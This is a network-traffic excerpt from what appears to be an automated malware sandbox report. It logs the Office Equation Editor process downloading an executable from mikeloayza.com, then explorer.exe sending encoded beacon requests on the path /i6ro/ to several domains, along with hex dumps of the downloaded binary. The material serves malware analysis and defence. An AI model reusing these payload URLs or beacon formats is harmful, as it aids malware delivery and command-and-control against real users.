                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 6b 65 6c 6f 61 79 7a 61 2e 63 6f 6d 2f 45 39 2f 69 34 4c 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mikeloayza.com/E9/i4L.exe">here</a>.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.22 | 49169 | 216.239.34.21 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 14, 2022 16:05:43.622512102 CET | 612 | OUT | GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.fisioletsgo.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:05:43.705197096 CET | 614 | IN | HTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              x-ua-compatible: IE=edge
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 14 Jan 2022 15:05:43 GMT
                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                              Content-Security-Policy: script-src 'report-sample' 'nonce-vAqIb00c7GC8dZd6P1blJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                              Cross-Origin-Opener-Policy: unsafe-none
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Content-Type-Options: nosniff
                                              Set-Cookie: NID=511=t0rMwAPz15wcHq-ZRZW5NoRI-ZH07DBtt8c_PgorYqrriUVH4ipIrYKjh0ffHc_zo5WfwvEaQSObKe8qX6yuxP2EUIlFy0oNXZuNi94Oh3zy6wjFiGXNxN4f9T2NkgZyLMdkQ6GUZ6HRYUptkpWx82kms0-bAKO6cwgX8XjSpwQ; expires=Sat, 16-Jul-2022 15:05:43 GMT; path=/; domain=.google.com; HttpOnly
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 76 41 71 49 62 30 30 63 37 47 43 38 64 5a 64 36 50 31 62 6c 4a 41 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 22 45 50 31 79 6b 64 22 3a 5b 22 2f 5f 2f 2a 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 22 2c 22
                                              Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/LocalBusiness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="vAqIb00c7GC8dZd6P1blJA">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.google.com","EP1ykd":["/_/*","/local/business","
                                              Jan 14, 2022 16:05:43.705229998 CET | 615 | IN | Data Raw: 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 2f 2a 22 2c 22 2f 70 6f 73 74 73 2f 6c 2f 3a 6c 69 73 74 69 6e 67 49 64 22 2c 22 2f 72 65 73 74 61 75 72 61 6e 74 73 22 2c 22 2f 72 65 73 74 61 75 72 61 6e 74 73 2f 2a 22 2c 22 2f 77 65 62 73 69 74 65
                                              Data Ascii: /local/business/*","/posts/l/:listingId","/restaurants","/restaurants/*","/website/_/*","/website/demo","/website/demo/","/website/demo/*"],"FdrFJe":"-8693368695651206656","Im6cmf":"/_/GeoMerchantPrestoSiteUi","LVIXXb":1,"LoQv7e":true,"MT7f9b"
                                              Jan 14, 2022 16:05:43.705254078 CET | 616 | IN | Data Raw: 22 2c 22 76 56 6b 61 45 62 22 3a 22 22 2c 22 76 58 6d 75 74 64 22 3a 22 25 2e 40 2e 5c 22 47 42 5c 22 2c 5c 22 5a 5a 5c 22 2c 5c 22 56 42 45 30 45 67 5c 5c 75 30 30 33 64 5c 5c 75 30 30 33 64 5c 22 5d 22 2c 22 77 32 62 74 41 65 22 3a 22 25 2e 40
                                              Data Ascii: ","vVkaEb":"","vXmutd":"%.@.\"GB\",\"ZZ\",\"VBE0Eg\\u003d\\u003d\"]","w2btAe":"%.@.null,null,\"\",true,null,null,null,false]","zChJod":"%.@.]"};</script><script nonce="vAqIb00c7GC8dZd6P1blJA">(function(){/* Copyright The Closure Library Auth
                                              Jan 14, 2022 16:05:43.705276012 CET | 618 | IN | Data Raw: 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 29 72 65 74 75 72 6e 21 30 3b 65 3d 63 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 63 3d 65 2e 6c 65 66 74 2b 61 2e 70 61 67 65 58 4f 66 66 73 65 74 3b 67 3d 65 2e
                                              Data Ascii: oundingClientRect)return!0;e=c.getBoundingClientRect();c=e.left+a.pageXOffset;g=e.top+a.pageYOffset;if(0>g+e.height||0>c+e.width||0>=e.height||0>=e.width)return!1;b=b.documentElement;return g<=(a.innerHeight||b.clientHeight)&&c<=(a.innerWidth|
                                              Jan 14, 2022 16:05:43.705297947 CET | 619 | IN | Data Raw: 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 31 39 36 37 64 32 7d 69 6d 67 7b 62 6f 72 64 65
                                              Data Ascii: otoDraft,Helvetica,Arial,sans-serif}a{text-decoration:none;color:#1967d2}img{border:none}#apps-debug-tracers{display:none}.oYxtQd,.PDllHc,.PDvGL{cursor:pointer}.oYxtQd:hover,.PDllHc:hover,.PDvGL:hover{text-decoration:none}.y2Yetb{cursor:defaul
                                              Jan 14, 2022 16:05:43.705321074 CET | 621 | IN | Data Raw: 67 29 7d 2e 44 50 76 77 59 63 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4d 61 74 65 72 69 61 6c 20 49 63 6f 6e 73 20 45 78 74 65 6e 64 65 64 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72
                                              Data Ascii: g)}.DPvwYc{font-family:'Material Icons Extended';font-weight:normal;font-style:normal;font-size:24px;line-height:1;letter-spacing:normal;text-rendering:optimizeLegibility;text-transform:none;display:inline-block;word-wrap:normal;direction:ltr;
                                              Jan 14, 2022 16:05:43.705343008 CET | 622 | IN | Data Raw: 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 31 73 7d 2e 67 68 79 50 45 63 20 2e 56 55 6f 4b 5a 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 7d 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 71 43 68 72 6f 6d 65 61 70 69 50 61 67 65 50 72 6f 67 72 65 73 73
                                              Data Ascii: mation-delay:.1s}.ghyPEc .VUoKZ{position:fixed}@keyframes boqChromeapiPageProgressAnimation{0%{transform:scaleX(0)}50%{transform:scaleX(5)}to{transform:scaleX(5) translateX(100%)}}.kFwPee{height:100%}.ydMMEb{width:100%}.SSPGKf{display:block;ov
                                              Jan 14, 2022 16:05:43.705363989 CET | 623 | IN | Data Raw: 65 3b 62 6f 78 2d 66 6c 65 78 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 31 34 70 78 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72
                                              Data Ascii: e;box-flex:0;flex-grow:0;flex-shrink:0;font-size:17px;padding:0 14px;text-transform:capitalize;white-space:nowrap}.dtKbfb .xPRkMe{font-size:17px;padding:0 12px}.hfmNEe{align-items:center;background-color:rgba(0,0,0,.5);bottom:0;display:none;ju
                                              Jan 14, 2022 16:05:43.705384970 CET | 625 | IN | Data Raw: 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 32 35 30 6d 73 2c 6f 70 61 63 69 74 79 20 32 35 30 6d 73 3b 77 69 64 74 68 3a 34 30 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 34 35 3b 74 6f 70 3a 37
                                              Data Ascii: sition:fixed;transition:transform 250ms,opacity 250ms;width:400px;z-index:45;top:70px}[dir='ltr'] .ZmaiX{left:0;right:auto;transform:translateX(-105%)}[dir='rtl'] .ZmaiX{right:0;left:auto;transform:translateX(105%)}@media all and (-ms-high-con
                                              Jan 14, 2022 16:05:43.705406904 CET | 626 | IN | Data Raw: 2d 77 69 64 74 68 3a 36 34 30 70 78 29 7b 2e 63 32 7a 7a 53 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 32 30 70 78 7d 2e 63 66 53 6f 76 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 7d 2e 43 53 38 31 55 2c 2e
                                              Data Ascii: -width:640px){.c2zzSe{font-size:22px;padding:0 20px}.cfSov{font-size:23px}.CS81U,.IeYwod{height:64px;justify-content:space-between;padding:0 66px}}.jY7uzd{align-items:center;box-sizing:border-box;display:flex;flex-direction:column;line-height:
                                              Jan 14, 2022 16:05:43.724138975 CET | 628 | IN | Data Raw: 63 69 74 79 3a 30 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 20 73 63 61 6c 65 28 32 29 3b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 71 75 61 6e 74 75 6d 57 69 7a
                                              Data Ascii: city:0}to{transform:translate(-50%,-50%) scale(2);opacity:1}}@keyframes quantumWizRadialInkSpread{0%{transform:scale(1.5);opacity:0}to{transform:scale(2.5);opacity:1}}@keyframes quantumWizRadialInkFocusPulse{0%{transform:scale(2);opacity:0}to{


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              3 | 192.168.2.22 | 49171 | 162.0.209.73 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 14, 2022 16:05:53.933439016 CET | 632 | OUT | GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.bitcointradel.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:05:54.111656904 CET | 634 | IN | HTTP/1.1 301 Moved Permanently
                                              keep-alive: timeout=5, max=100
                                              content-type: text/html
                                              content-length: 707
                                              date: Fri, 14 Jan 2022 15:05:54 GMT
                                              server: LiteSpeed
                                              location: https://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p
                                              x-turbo-charged-by: LiteSpeed
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              x-content-type-options: nosniff
                                              strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                              referrer-policy: no-referrer-when-downgrade
                                              connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 
68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              4 | 192.168.2.22 | 49172 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 14, 2022 16:06:04.249555111 CET | 635 | OUT | GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.executive-air.net
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Timestamp: Jan 14, 2022 16:06:04.365375996 CET, kBytes transferred: 635, Direction: IN
                                              Data: HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Fri, 14 Jan 2022 15:06:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "618be761-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session ID: 5, Source IP: 192.168.2.22, Source Port: 49173, Destination IP: 118.67.131.217, Destination Port: 80, Process: C:\Windows\explorer.exe
                                              Timestamp: Jan 14, 2022 16:06:19.047626972 CET, kBytes transferred: 636, Direction: OUT
                                              Data: GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.luckyfandom.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Timestamp: Jan 14, 2022 16:06:19.428003073 CET, kBytes transferred: 637, Direction: IN
                                              Data: HTTP/1.1 302 Found
                                              Date: Fri, 14 Jan 2022 15:06:19 GMT
                                              P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
                                              Location: /
                                              Content-Length: 0
                                              Content-Type: text/html; charset=euc-kr
                                              Age: 0
                                              Connection: close


                                              HTTPS Proxied Packets

                                              Session ID: 0, Source IP: 192.168.2.22, Source Port: 49168, Destination IP: 131.153.37.4, Destination Port: 443, Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Timestamp: 2022-01-14 15:04:35 UTC, kBytes transferred: 0, Direction: OUT
                                              Data: GET /E9/i4L.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Connection: Keep-Alive
                                              Host: mikeloayza.com
                                              Timestamp: 2022-01-14 15:04:35 UTC, kBytes transferred: 0, Direction: IN
                                              Data: HTTP/1.1 200 OK
                                              Date: Fri, 14 Jan 2022 15:04:34 GMT
                                              Server: Apache
                                              ETag: "92e00-5d5883126df7c"
                                              Accept-Ranges: bytes
                                              Content-Length: 601600
                                              Cache-Control: max-age=31536000
                                              Expires: Sat, 14 Jan 2023 15:04:34 GMT
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Connection: close
                                              Content-Type: application/x-msdownload
                                              Data Ascii: SiW6YgIXDd#)`"jC9QAvM:W*xU_||w{7}/2e~p[};@BPy#v/d;m4@[7=_4[Z$6[g-Otq_IJJ%}TW4H}3w#)feKwf+O>F?(XAK5
                                              2022-01-14 15:04:36 UTC480INData Raw: 26 bb 30 b3 08 f9 47 b0 a4 1b 62 7b e7 4c f7 83 24 a8 28 53 00 06 af 49 36 44 b0 9d cf 10 ef ad 89 31 0b 82 75 88 01 90 00 2a b2 61 c4 1f ee c0 a5 c4 5d c9 77 61 7c 84 84 c3 c9 b4 50 60 75 87 4f 3f a9 7a 8c d0 00 24 4b 79 fc 6e fb 18 e9 88 77 ec 16 3f bf d3 86 53 57 2f ac bc 28 f4 a2 0e 77 75 b0 5b be 43 76 ae b9 7b f0 73 f7 49 30 23 97 e5 bc 73 67 7f 78 14 d7 55 81 f7 00 d8 e7 36 92 90 f4 a5 40 fe b1 5d 83 08 1f 46 66 65 11 3f 7f 4d 00 a3 98 04 47 da ae 65 d8 01 01 62 a3 1b e0 c7 ee 7e fe 73 f7 ff f5 62 f7 79 80 ee 1e f0 e6 c1 5b 4d 6f 06 b0 d7 e0 12 df 23 f5 d7 57 5e b1 78 05 21 03 49 80 7a d7 c5 6b 17 c0 ef 8c f0 fa ce ba f0 af cf 59 17 26 2b e2 df b8 33 85 96 8b 2f 5d 72 08 19 48 21 c0 aa d5 9c 2b c9 ee 36 4b 6b 42 15 b3 06 39 01 a1 9e 3d b2 56 24 35
                                              Data Ascii: &0Gb{L$(SI6D1u*a]wa|P`uO?z$Kynw?SW/(wu[Cv{sI0#sgxU6@]Ffe?MGeb~sby[Mo#W^x!IzkY&+3/]rH!+6KkB9=V$5
                                              2022-01-14 15:04:36 UTC496INData Raw: 09 e9 56 27 ce 71 a1 c3 74 59 e0 92 00 b0 0f fe 36 71 ad 9f dd dc 3d f8 32 01 c6 d9 8e 2d 09 ac 7f 82 90 81 ca d2 6f 12 32 10 c7 99 cf 15 d7 73 4f fd f2 0a f8 e2 3b f1 6d ee 73 e1 67 9e 4b 5d f8 4e fb 78 ef f2 a7 f0 ff 20 64 e0 11 01 56 43 75 d7 54 e3 b6 18 43 b4 af 5a c8 01 60 43 f7 e1 15 0f 2e 5e 4b 2c a2 05 9c 12 dd 7a 16 f8 ae 47 7f 17 3c 0a 9c 02 40 79 60 38 1f 43 51 56 df b5 c6 11 0c c1 dd 05 31 ae 28 b9 e7 8a 95 7c 3c b6 06 25 e4 ec c7 f3 6b 56 19 be 01 ad ff 7f 5d bd 09 94 2b 79 7d df db 2d 05 d3 da f7 ad 5b 25 75 6b 01 95 4a a5 d2 be 74 6b 19 ba 5b a3 7d df 55 ba d2 4c b7 34 da f7 d2 56 d2 48 0e 9e 4b 4e fc 60 e2 b1 1d 3b c9 61 0b be c6 cf c1 e4 d9 31 18 82 f1 f8 e1 00 e3 d8 38 0e 89 1d ec 40 62 68 30 0f 78 06 1f fb 9d 38 26 d8 f0 aa 74 07 27 99
                                              Data Ascii: V'qtY6q=2-o2sO;msgK]Nx dVCuTCZ`C.^K,zG<@y`8CQV1(|<%kV]+y}-[%ukJtk[}UL4VHKN`;a18@bh0x8&t'
                                              2022-01-14 15:04:36 UTC512INData Raw: e7 c8 cf c8 d8 94 e7 94 2b b7 f5 be d1 a6 21 7b 94 aa 3e eb 45 53 9f f9 82 69 cc 7e d1 34 39 d5 65 3e 67 6a af 3e 27 8f 89 e4 b8 fe da 73 a6 41 8e 1b 32 9f 95 db cf ca 63 cf 98 9a 2b 4f 9b 7a 19 eb 33 9f 31 75 72 dc 94 3f d5 dc 6a 3b 6e ca ae ad 30 1b 27 7d d5 43 60 59 4f 7f ce ef 01 e0 ee 00 f8 35 36 f0 4c 7e e4 d7 6f 2d 7e f6 bf 9a dc 6b 93 cd e9 d7 7f d6 09 00 27 77 de ef 4a 80 8f 02 00 c3 ba 00 c0 30 93 7b 31 06 00 97 86 77 02 40 59 ce 14 73 a3 3d cb b4 35 9d 13 00 ac 53 d5 a9 00 80 d7 06 3b 62 fe 72 0f 00 cc bf c1 69 63 04 00 95 40 20 a2 96 10 10 5a 05 04 16 00 9b 2d 04 6a 2c 08 d4 fc 01 00 b6 38 00 c8 a8 02 00 a2 ba 68 75 08 04 2c 00 d2 a3 01 b0 4e 00 b0 bb 9f 79 fb f5 01 e6 f4 81 78 73 fa 20 10 18 2c 7f df a1 0e 00 c3 cd c5 13 62 7e 01 c0 e5 33 4f
                                              Data Ascii: +!{>ESi~49e>gj>'sA2c+Oz31ur?j;n0'}C`YO56L~o-~k'wJ0{1w@Ys=5S;bric@ Z-j,8hu,Nyxs ,b~3O
                                              2022-01-14 15:04:36 UTC528INData Raw: b4 37 ec 0f ce 05 e0 aa c0 cc f2 c4 70 5f 9b d3 e9 27 89 b2 2a 80 f1 99 f5 01 04 7d 02 62 bd df fc 03 10 80 04 cf f5 df 07 c8 eb 60 6c 1e c3 ec bc 1e 50 c1 f4 03 06 0c 88 bb ef be fb 74 15 81 9f a1 a4 e0 98 f7 a1 77 e0 bf 88 04 08 50 06 b0 c4 c8 49 4a 00 c9 b8 dd 84 3d 6e d4 6e 54 6f f9 20 e8 45 41 e7 0d ff 4c a7 04 70 c6 6f 04 ca 9c 64 2e 76 02 c0 b8 4e 00 c8 4e f7 09 20 41 57 03 02 00 9c 8d 0f 01 c0 97 00 f1 d6 fc e7 13 22 7d 80 a0 14 70 29 40 93 40 42 d0 08 0c 9b 9f 14 90 e7 cc 9f 9f ea 01 30 58 01 50 5d c0 d7 81 7b 00 8c b7 d2 52 00 f3 a3 f1 02 80 09 02 00 51 ce 04 05 41 18 00 51 10 50 00 88 30 7e de a4 18 00 58 35 a9 1c 00 c2 20 28 8a a8 55 21 30 55 00 30 55 37 05 dd 8a 49 00 fb b7 ce d6 73 01 fc 05 41 30 3e 00 f0 97 05 f7 3b 01 3d 04 fc 25 c1 fc 85
                                              Data Ascii: 7p_'*}b`lPtwPIJ=nnTo EALpod.vNN AW"}p)@@B0XP]{RQAQP0~X5 (U!0U0U7IsA0>;=%
                                              2022-01-14 15:04:36 UTC544INData Raw: 56 00 2c 8a 01 40 46 7c 0f 80 3e d9 01 b0 3c 13 00 fa a7 03 c0 1c 00 35 80 55 40 60 80 8a bf 79 8d af 01 68 43 d0 9a 01 c9 b3 01 11 00 82 03 08 b1 0b f1 a7 02 60 9d 87 c0 fe f5 25 2d 00 60 78 76 00 20 7e f9 39 13 00 e2 e2 3f 15 07 80 c4 e9 10 67 08 05 40 59 12 00 ce a6 01 a0 4c d2 81 32 f7 e5 89 77 dc b7 e2 04 9a d7 3c 24 2e e0 06 b7 f8 95 1e 6e ee 07 2f 38 c9 93 a3 bb 07 59 3d 80 db 87 d9 5d 84 6d c5 20 2b 05 b9 7b 10 a9 00 a2 8f 0b df 0a 84 fc 8c 03 00 00 a3 4a f3 dc 33 77 ff 87 9b f3 62 47 57 27 0e 60 9f 8c f2 08 1e 00 1c 94 d1 1f 37 60 10 b8 70 e8 0d 77 e1 d8 0c 37 fb 59 2f fe 57 27 ff 64 e3 fc 97 fb fd 7f e4 cc 54 d0 11 24 15 74 44 66 5b 71 31 c0 d0 a1 c7 0c 00 c2 22 0f b7 bd fc c9 bf 19 75 11 22 f0 70 29 5d 7a c0 84 d1 9d f7 31 6a 5b f1 8e 74 20 3e
                                              Data Ascii: V,@F|><5U@`yhC`%-`xv ~9?g@YL2w<$.n/8Y=]m +{J3wbGW'`7`pw7Y/W'dT$tDf[q1"u"p)]z1j[t >
